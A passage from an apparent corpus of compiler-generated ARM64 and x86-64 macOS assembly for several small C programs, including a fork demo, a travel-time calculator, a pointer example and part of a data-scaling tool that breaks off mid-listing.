"\n" L_.str.3: ## @.str.3 .asciz "Visited %d \n" .subsections_via_symbols
the_stack_data/51700915.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] bl _fork stur w0, [x29, #-8] ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_3 b LBB0_1 LBB0_1: b LBB0_2 LBB0_2: ; =>This Inner Loop Header: Depth=1 b LBB0_2 LBB0_3: ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 str x8, [sp, #16] ; 8-byte Folded Spill bl _getpid ldr x8, [sp, #16] ; 8-byte Folded Reload mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x0 str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_4 LBB0_4: mov w0, #1 bl _sleep mov w0, #0 ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Pid of child %i, Pid of me %i\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) callq _fork movl %eax, -8(%rbp) cmpl $0, -8(%rbp) jne LBB0_3 ## %bb.1: jmp LBB0_2 LBB0_2: ## =>This Inner Loop Header: Depth=1 jmp LBB0_2 LBB0_3: movl -8(%rbp), %eax movl %eax, -12(%rbp) ## 4-byte Spill callq _getpid movl -12(%rbp), %esi ## 4-byte Reload movl %eax, %edx leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.4: movl $1, %edi callq _sleep xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Pid of child %i, Pid of me %i\n" .subsections_via_symbols
the_stack_data/170451896.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __DATA,__data .globl _Version ; @Version _Version: .asciz " rcpt500 v%VERSION% (%WHEN%)\n\t%WHOANDWHERE%\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __DATA,__data .globl _Version ## @Version .p2align 4 _Version: .asciz " rcpt500 v%VERSION% (%WHEN%)\n\t%WHOANDWHERE%\n" .subsections_via_symbols
the_stack_data/120490.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #8] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp adrp x8, _distance@GOTPAGE ldr x8, [x8, _distance@GOTPAGEOFF] str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf bl _soundspeed ldr w0, [sp, #8] ; 4-byte Folded Reload ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function soundspeed lCPI1_0: .quad 0x4091a40000000000 ; double 1129 .section __TEXT,__text,regular,pure_instructions .globl _soundspeed .p2align 2 _soundspeed: ; @soundspeed .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _distance@GOTPAGE ldr x8, [x8, _distance@GOTPAGEOFF] ldr d0, [x8] adrp x8, lCPI1_0@PAGE ldr d1, [x8, lCPI1_0@PAGEOFF] fdiv d0, d0, d1 mov x8, sp str d0, [x8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter distance in feet: " l_.str.1: ; @.str.1 .asciz "%lf" .comm _distance,8,3 ; @distance l_.str.2: ; @.str.2 .asciz "Travel time: %f\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi movq _distance@GOTPCREL(%rip), %rsi movb $0, %al callq _scanf callq _soundspeed xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function soundspeed LCPI1_0: .quad 0x4091a40000000000 ## double 1129 .section __TEXT,__text,regular,pure_instructions .globl _soundspeed .p2align 4, 0x90 _soundspeed: ## @soundspeed .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq _distance@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 leaq L_.str.2(%rip), %rdi movb $1, %al callq _printf popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Enter distance in feet: " L_.str.1: ## @.str.1 .asciz "%lf" .comm _distance,8,3 ## @distance L_.str.2: ## @.str.2 .asciz "Travel time: %f\n" .subsections_via_symbols
the_stack_data/784654.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-8] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x8, _one@PAGE ldr d0, [x8, _one@PAGEOFF] adrp x8, _two@PAGE ldr d1, [x8, _two@PAGEOFF] bl _fun adrp x8, _out1@GOTPAGE ldr x8, [x8, _out1@GOTPAGEOFF] ldr d1, [x8] adrp x8, _out2@GOTPAGE ldr x8, [x8, _out2@GOTPAGEOFF] ldr d0, [x8] mov x8, sp str d1, [x8] str d0, [x8, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-8] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _fun ; -- Begin function fun .p2align 2 _fun: ; @fun .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str d0, [sp, #8] str d1, [sp] ldr d0, [sp, #8] adrp x8, _ptr1@PAGE ldr x8, [x8, _ptr1@PAGEOFF] str d0, [x8] ldr d0, [sp] adrp x8, _ptr2@PAGE ldr x8, [x8, _ptr2@PAGEOFF] str d0, [x8] add sp, sp, #16 ret .cfi_endproc ; -- End function .section __DATA,__data .globl _one ; @one .p2align 3 _one: .quad 0x3ff0000000000000 ; double 1 .globl _two ; @two .p2align 3 _two: .quad 0x4000000000000000 ; double 2 .comm _out1,8,3 ; @out1 .globl _ptr1 ; @ptr1 .p2align 3 _ptr1: .quad _out1 .comm _out2,8,3 ; @out2 .globl _ptr2 ; @ptr2 .p2align 3 _ptr2: .quad _out2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "The value of out1 = %f and the value of out2 = %f" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movsd _one(%rip), %xmm0 ## xmm0 = mem[0],zero movsd _two(%rip), %xmm1 ## xmm1 = mem[0],zero callq _fun movq _out1@GOTPCREL(%rip), %rax movsd (%rax), %xmm0 ## xmm0 = mem[0],zero movq _out2@GOTPCREL(%rip), %rax movsd (%rax), %xmm1 ## xmm1 = mem[0],zero leaq L_.str(%rip), %rdi movb $2, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _fun ## -- Begin function fun .p2align 4, 0x90 _fun: ## @fun .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movsd %xmm0, -8(%rbp) movsd %xmm1, -16(%rbp) movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _ptr1(%rip), %rax movsd %xmm0, (%rax) movsd -16(%rbp), %xmm0 ## xmm0 = mem[0],zero movq _ptr2(%rip), %rax movsd %xmm0, (%rax) popq %rbp retq .cfi_endproc ## -- End function .section __DATA,__data .globl _one ## @one .p2align 3 _one: .quad 0x3ff0000000000000 ## double 1 .globl _two ## @two .p2align 3 _two: .quad 0x4000000000000000 ## double 2 .comm _out1,8,3 ## @out1 .globl _ptr1 ## @ptr1 .p2align 3 _ptr1: .quad _out1 .comm _out2,8,3 ## @out2 .globl _ptr2 ## @ptr2 .p2align 3 _ptr2: .quad _out2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "The value of out1 = %f and the value of out2 = %f" .subsections_via_symbols
the_stack_data/692775.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _exit_with_help ; -- Begin function exit_with_help .p2align 2 _exit_with_help: ; @exit_with_help .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #1 bl _exit .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI1_0: .quad 0x7fefffffffffffff ; double 1.7976931348623157E+308 lCPI1_1: .quad 0xffefffffffffffff ; double -1.7976931348623157E+308 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #400 .cfi_def_cfa_offset 400 stp x28, x27, [sp, #368] ; 16-byte Folded Spill stp x29, x30, [sp, #384] ; 16-byte Folded Spill add x29, sp, #384 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, _y_lower@GOTPAGE ldr x8, [x8, _y_lower@GOTPAGEOFF] str x8, [sp, #152] ; 8-byte Folded Spill adrp x8, _y_upper@GOTPAGE ldr x8, [x8, _y_upper@GOTPAGEOFF] str x8, [sp, #160] ; 8-byte Folded Spill adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] str x8, [sp, #168] ; 8-byte Folded Spill adrp x8, _max_index@GOTPAGE ldr x8, [x8, _max_index@GOTPAGEOFF] str x8, [sp, #176] ; 8-byte Folded Spill adrp x8, _feature_max@GOTPAGE ldr x8, [x8, _feature_max@GOTPAGEOFF] str x8, [sp, #184] ; 8-byte Folded Spill adrp x8, _feature_min@GOTPAGE ldr x8, [x8, _feature_min@GOTPAGEOFF] str x8, [sp, #192] ; 8-byte Folded Spill stur wzr, [x29, #-20] stur w0, [x29, #-24] stur x1, [x29, #-32] ; kill: def $x8 killed $xzr stur xzr, [x29, #-56] stur xzr, [x29, #-64] stur xzr, [x29, #-72] mov w8, #1 stur w8, [x29, #-36] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-36] ldur w9, [x29, #-24] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_14 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] subs w8, w8, #45 cset w8, eq tbnz w8, #0, LBB1_4 b LBB1_3 LBB1_3: b LBB1_14 LBB1_4: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] ldur x8, [x29, #-32] ldur w9, [x29, #-36] subs w9, w9, #1 ldr x8, [x8, w9, sxtw #3] ldrsb w8, [x8, #1] subs w8, w8, #108 ; kill: def $x8 killed $w8 str x8, [sp, #144] ; 8-byte Folded Spill subs x8, x8, #13 cset w8, hi tbnz w8, #0, LBB1_11 ; %bb.5: ; in Loop: Header=BB1_1 Depth=1 ldr x11, [sp, #144] ; 8-byte Folded Reload adrp x10, lJTI1_0@PAGE add x10, x10, lJTI1_0@PAGEOFF Ltmp0: adr x8, Ltmp0 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x0, [x8, x9, lsl #3] bl _atof adrp x8, _lower@PAGE str d0, [x8, _lower@PAGEOFF] b LBB1_12 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x0, [x8, x9, lsl #3] bl _atof adrp x8, _upper@PAGE str d0, [x8, _upper@PAGEOFF] b LBB1_12 LBB1_8: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x0, [x8, x9, lsl #3] bl _atof ldr x8, [sp, #152] ; 8-byte Folded Reload str d0, [x8] ldur w8, [x29, #-36] mov w9, #1 str w9, [sp, #140] ; 4-byte Folded Spill add w8, w8, #1 stur w8, [x29, #-36] ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x0, [x8, x9, lsl #3] bl _atof ldr x9, [sp, #160] ; 8-byte Folded Reload ldr w8, [sp, #140] ; 4-byte Folded Reload str d0, [x9] adrp x9, _y_scaling@PAGE str w8, [x9, _y_scaling@PAGEOFF] b LBB1_12 LBB1_9: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-64] b LBB1_12 LBB1_10: ; in Loop: Header=BB1_1 Depth=1 ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-72] b LBB1_12 LBB1_11: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fprintf bl _exit_with_help b LBB1_12 LBB1_12: ; in Loop: Header=BB1_1 Depth=1 b LBB1_13 LBB1_13: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_1 LBB1_14: adrp x8, _upper@PAGE ldr d0, [x8, _upper@PAGEOFF] adrp x8, _lower@PAGE ldr d1, [x8, _lower@PAGEOFF] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB1_17 b LBB1_15 LBB1_15: adrp x8, _y_scaling@PAGE ldr w8, [x8, _y_scaling@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_18 b LBB1_16 LBB1_16: ldr x8, [sp, #152] ; 8-byte Folded Reload ldr x9, [sp, #160] ; 8-byte Folded Reload ldr d0, [x9] ldr d1, [x8] fcmp d0, d1 cset w8, gt tbnz w8, #0, LBB1_18 b LBB1_17 LBB1_17: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_18: ldur x8, [x29, #-72] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_21 b LBB1_19 LBB1_19: ldur x8, [x29, #-64] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_21 b LBB1_20 LBB1_20: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_21: ldur w8, [x29, #-24] ldur w9, [x29, #-36] add w9, w9, #1 subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_23 b LBB1_22 LBB1_22: bl _exit_with_help b LBB1_23 LBB1_23: ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x0, [x8, x9, lsl #3] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fopen stur x0, [x29, #-48] ldur x8, [x29, #-48] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_25 b LBB1_24 LBB1_24: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] ldur x8, [x29, #-32] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] mov x9, sp str x8, [x9] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_25: adrp x8, _max_line_len@PAGE ldrsw x8, [x8, _max_line_len@PAGEOFF] lsr x0, x8, #0 bl _malloc ldr x8, [sp, #176] ; 8-byte Folded Reload adrp x9, _line@PAGE str x0, [x9, _line@PAGEOFF] str wzr, [x8] ldur x8, [x29, #-72] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_37 b LBB1_26 LBB1_26: ldur x0, [x29, #-72] adrp x1, l_.str.4@PAGE add x1, x1, l_.str.4@PAGEOFF bl _fopen stur x0, [x29, #-56] ldur x8, [x29, #-56] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_28 b LBB1_27 LBB1_27: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] ldur x8, [x29, #-72] mov x9, sp str x8, [x9] adrp x1, l_.str.5@PAGE add x1, x1, l_.str.5@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_28: ldur x0, [x29, #-56] bl _fgetc stur w0, [x29, #-80] ldur w8, [x29, #-80] subs w8, w8, #121 cset w8, ne tbnz w8, #0, LBB1_30 b LBB1_29 LBB1_29: ldur x0, [x29, #-56] bl _readline ldur x0, [x29, #-56] bl _readline ldur x0, [x29, #-56] bl _readline b LBB1_30 LBB1_30: ldur x0, [x29, #-56] bl _readline ldur x0, [x29, #-56] bl _readline b LBB1_31 LBB1_31: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-56] mov x9, sp sub x8, x29, #76 str x8, [x9] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fscanf subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB1_36 b LBB1_32 LBB1_32: ; in Loop: Header=BB1_31 Depth=1 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-76] ldr w9, [x9] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB1_34 b LBB1_33 LBB1_33: ; in Loop: Header=BB1_31 Depth=1 ldur w8, [x29, #-76] str w8, [sp, #136] ; 4-byte Folded Spill b LBB1_35 LBB1_34: ; in Loop: Header=BB1_31 Depth=1 ldr x8, [sp, #176] ; 8-byte Folded Reload ldr w8, [x8] str w8, [sp, #136] ; 4-byte Folded Spill b LBB1_35 LBB1_35: ; in Loop: Header=BB1_31 Depth=1 ldr x9, [sp, #176] ; 8-byte Folded Reload ldr w8, [sp, #136] ; 4-byte Folded Reload str w8, [x9] b LBB1_31 LBB1_36: ldur x0, [x29, #-56] bl _rewind b LBB1_37 LBB1_37: b LBB1_38 LBB1_38: ; =>This Loop Header: Depth=1 ; Child Loop BB1_40 Depth 2 ; Child Loop BB1_43 Depth 2 ; Child Loop BB1_46 Depth 2 ; Child Loop BB1_51 Depth 3 ; Child Loop BB1_54 Depth 3 ; Child Loop BB1_57 Depth 3 ldur x0, [x29, #-48] bl _readline subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_63 b LBB1_39 LBB1_39: ; in Loop: Header=BB1_38 Depth=1 adrp x8, _line@PAGE ldr x8, [x8, _line@PAGEOFF] stur x8, [x29, #-88] b LBB1_40 LBB1_40: ; Parent Loop BB1_38 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-88] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_42 b LBB1_41 LBB1_41: ; in Loop: Header=BB1_40 Depth=2 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_40 LBB1_42: ; in Loop: Header=BB1_38 Depth=1 b LBB1_43 LBB1_43: ; Parent Loop BB1_38 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-88] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_45 b LBB1_44 LBB1_44: ; in Loop: Header=BB1_43 Depth=2 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_43 LBB1_45: ; in Loop: Header=BB1_38 Depth=1 b LBB1_46 LBB1_46: ; Parent Loop BB1_38 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB1_51 Depth 3 ; Child Loop BB1_54 Depth 3 ; Child Loop BB1_57 Depth 3 ldur x0, [x29, #-88] mov x9, sp sub x8, x29, #40 str x8, [x9] adrp x1, l_.str.7@PAGE add x1, x1, l_.str.7@PAGEOFF bl _sscanf subs w8, w0, #1 cset w8, ne tbnz w8, #0, LBB1_62 b LBB1_47 LBB1_47: ; in Loop: Header=BB1_46 Depth=2 ldr x8, [sp, #176] ; 8-byte Folded Reload ldr w8, [x8] ldur w9, [x29, #-40] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB1_49 b LBB1_48 LBB1_48: ; in Loop: Header=BB1_46 Depth=2 ldr x8, [sp, #176] ; 8-byte Folded Reload ldr w8, [x8] str w8, [sp, #132] ; 4-byte Folded Spill b LBB1_50 LBB1_49: ; in Loop: Header=BB1_46 Depth=2 ldur w8, [x29, #-40] str w8, [sp, #132] ; 4-byte Folded Spill b LBB1_50 LBB1_50: ; in Loop: Header=BB1_46 Depth=2 ldr x9, [sp, #176] ; 8-byte Folded Reload ldr w8, [sp, #132] ; 4-byte Folded Reload str w8, [x9] b LBB1_51 LBB1_51: ; Parent Loop BB1_38 Depth=1 ; Parent Loop BB1_46 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-88] ldrsb w8, [x8] subs w8, w8, #58 cset w8, eq tbnz w8, #0, LBB1_53 b LBB1_52 LBB1_52: ; in Loop: Header=BB1_51 Depth=3 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_51 LBB1_53: ; in Loop: Header=BB1_46 Depth=2 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_54 LBB1_54: ; Parent Loop BB1_38 Depth=1 ; Parent Loop BB1_46 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-88] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_56 b LBB1_55 LBB1_55: ; in Loop: Header=BB1_54 Depth=3 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_54 LBB1_56: ; in Loop: Header=BB1_46 Depth=2 b LBB1_57 LBB1_57: ; Parent Loop BB1_38 Depth=1 ; Parent Loop BB1_46 Depth=2 ; => This Inner Loop Header: Depth=3 ldur x8, [x29, #-88] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #128] ; 4-byte Folded Spill tbnz w8, #0, LBB1_59 b LBB1_58 LBB1_58: ; in Loop: Header=BB1_57 Depth=3 ldur x8, [x29, #-88] ldrsb w0, [x8] bl _isspace subs w8, w0, #0 cset w8, eq str w8, [sp, #128] ; 4-byte Folded Spill b LBB1_59 LBB1_59: ; in Loop: Header=BB1_57 Depth=3 ldr w8, [sp, #128] ; 4-byte Folded Reload tbz w8, #0, LBB1_61 b LBB1_60 LBB1_60: ; in Loop: Header=BB1_57 Depth=3 ldur x8, [x29, #-88] add x8, x8, #1 stur x8, [x29, #-88] b LBB1_57 LBB1_61: ; in Loop: Header=BB1_46 Depth=2 adrp x9, _num_nonzeros@PAGE ldr x8, [x9, _num_nonzeros@PAGEOFF] add x8, x8, #1 str x8, [x9, _num_nonzeros@PAGEOFF] b LBB1_46 LBB1_62: ; in Loop: Header=BB1_38 Depth=1 b LBB1_38 LBB1_63: ldur x0, [x29, #-48] bl _rewind ldr x8, [sp, #176] ; 8-byte Folded Reload ldr w8, [x8] add w9, w8, #1 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x0, x8, #3 bl _malloc ldr x8, [sp, #176] ; 8-byte Folded Reload ldr x9, [sp, #184] ; 8-byte Folded Reload str x0, [x9] ldr w8, [x8] add w9, w8, #1 ; implicit-def: $x8 mov x8, x9 sxtw x8, w8 lsl x0, x8, #3 bl _malloc ldr x9, [sp, #192] ; 8-byte Folded Reload ldr x8, [sp, #184] ; 8-byte Folded Reload str x0, [x9] ldr x8, [x8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_65 b LBB1_64 LBB1_64: ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x8, [x8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_66 b LBB1_65 LBB1_65: ldr x8, [sp, #168] ; 8-byte Folded Reload ldr x0, [x8] adrp x1, l_.str.8@PAGE add x1, x1, l_.str.8@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB1_66: stur wzr, [x29, #-36] b LBB1_67 LBB1_67: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #176] ; 8-byte Folded Reload ldur w8, [x29, #-36] ldr w9, [x9] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_70 b LBB1_68 LBB1_68: ; in Loop: Header=BB1_67 Depth=1 ldr x8, [sp, #192] ; 8-byte Folded Reload ldr x9, [sp, #184] ; 8-byte Folded Reload ldr x9, [x9] ldursw x10, [x29, #-36] adrp x11, lCPI1_1@PAGE ldr d0, [x11, lCPI1_1@PAGEOFF] str d0, [x9, x10, lsl #3] ldr x8, [x8] ldursw x9, [x29, #-36] adrp x10, lCPI1_0@PAGE ldr d0, [x10, lCPI1_0@PAGEOFF] str d0, [x8, x9, lsl #3] b LBB1_69 LBB1_69: ; in Loop: Header=BB1_67 Depth=1 ldur w8, [x29, #-36] add w8, w8, #1 stur w8, [x29, #-36] b LBB1_67 LBB1_70: b LBB1_71 LBB1_71: ; =>This Loop Header: Depth=1 ; Child Loop BB1_79 Depth 2 ; Child Loop BB1_82 Depth 2 ; Child Loop BB1_85 Depth 2 ; Child Loop BB1_87 Depth 3 ; Child Loop BB1_103 Depth 3 ; Child Loop BB1_106 Depth 3 ; Child Loop BB1_109 Depth 3 ; Child Loop BB1_115 Depth 2 ldur x0, [x29, #-48] bl _readline subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB1_125 b LBB1_72 LBB1_72: ; in Loop: Header=BB1_71 Depth=1 adrp x8, _line@PAGE ldr x8, [x8, _line@PAGEOFF] stur x8, [x29, #-96] mov w8, #1 stur w8, [x29, #-100] ldur x0, [x29, #-96] mov x9, sp sub x8, x29, #112 str x8, [x9] adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _sscanf adrp x8, _y_max@PAGE ldr d0, [x8, _y_max@PAGEOFF] ldur d1, [x29, #-112] fcmp d0, d1 cset w8, le tbnz w8, #0, LBB1_74 b LBB1_73 LBB1_73: ; in Loop: Header=BB1_71 Depth=1 adrp x8, _y_max@PAGE ldr d0, [x8, _y_max@PAGEOFF] str d0, [sp, #120] ; 8-byte Folded Spill b LBB1_75 LBB1_74: ; in Loop: Header=BB1_71 Depth=1 ldur d0, [x29, #-112] str d0, [sp, #120] ; 8-byte Folded Spill b LBB1_75 LBB1_75: ; in Loop: Header=BB1_71 Depth=1 ldr d0, [sp, #120] ; 8-byte Folded Reload adrp x8, _y_max@PAGE str d0, [x8, _y_max@PAGEOFF] adrp x8, _y_min@PAGE ldr d0, [x8, _y_min@PAGEOFF] ldur d1, [x29, #-112] fcmp d0, d1 cset w8, pl tbnz w8, 